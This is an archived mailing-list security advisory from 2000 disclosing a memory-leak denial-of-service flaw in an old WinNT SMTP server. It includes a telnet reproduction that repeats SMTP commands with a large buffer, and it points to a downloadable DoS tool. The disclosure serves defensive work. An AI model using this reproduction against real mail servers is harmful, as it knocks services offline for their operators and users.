Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)

From: Ussr Labs (labsat_private)
Date: Thu Jan 13 2000 - 00:25:27 PST

Next message: Mike Brown: "Re: XML in IE 5.0"

Previous message: Gregory Neil Shapiro: "Re: procmail / Sendmail - five bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)
Server for WinNT Version 1.9x

USSR Advisory Code:   USSR-2000031

Release Date:
January 13, 2000

Systems Affected:
Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for
WinNT Version  1.9x and maybe
other versions.

THE PROBLEM
A memory leak exists in the Super Mail Transfer Package  that may
cause an NT host to stop functioning and/or need to be rebooted.
The memory leak may occur when you connect to the SMTP port,
all information you send to the system will be stored in  memory,
and SMTP support multiples HELO/ MAIL FROM/ RCPT TO / DATA in the
same connection.
If you did multiple HELO/ MAIL FROM/ RCPT TO / DATA in the same
connection the  memory may not be deallocated. This condition may
cause the computer to stop  functioning the moment memory runs out.

Example:
[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK

If you repeat this commands all information passed to the server will
be stored in memory thus the memory leak problem,


Where [buffer] is aprox. 10000 characters.

Binary or source for this D.o.s:

http://www.ussrback.com/

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
contribution to w00giving for all you w00nderful people out there.
You do know what w00giving is don't you?
http://www.w00w00.org/advisories.html

Vendor Status:
Contacted.

Vendor   Url: http://www.web-net.com/supermail/
Program Url: http://shareit1.element5.com/programs.html?nr=100364

Credit: USSRLABS

SOLUTION
Vendor say:
The related problems are fixed in the next generation of SMTP call
MsgCore/NT.

Greetings:
EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN,
Technotronic and Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c
h
http://www.ussrback.com


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOH2LxNybEYfHhkiVEQIgVwCcCLk1ZS9j/HYz2Wmto/Ddbg9RVpEAn2Rc
vTxTmGxn8OehQXqO3YT9xdah
=HFI/
-----END PGP SIGNATURE-----

Next message: Mike Brown: "Re: XML in IE 5.0"
Previous message: Gregory Neil Shapiro: "Re: procmail / Sendmail - five bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:00 PDT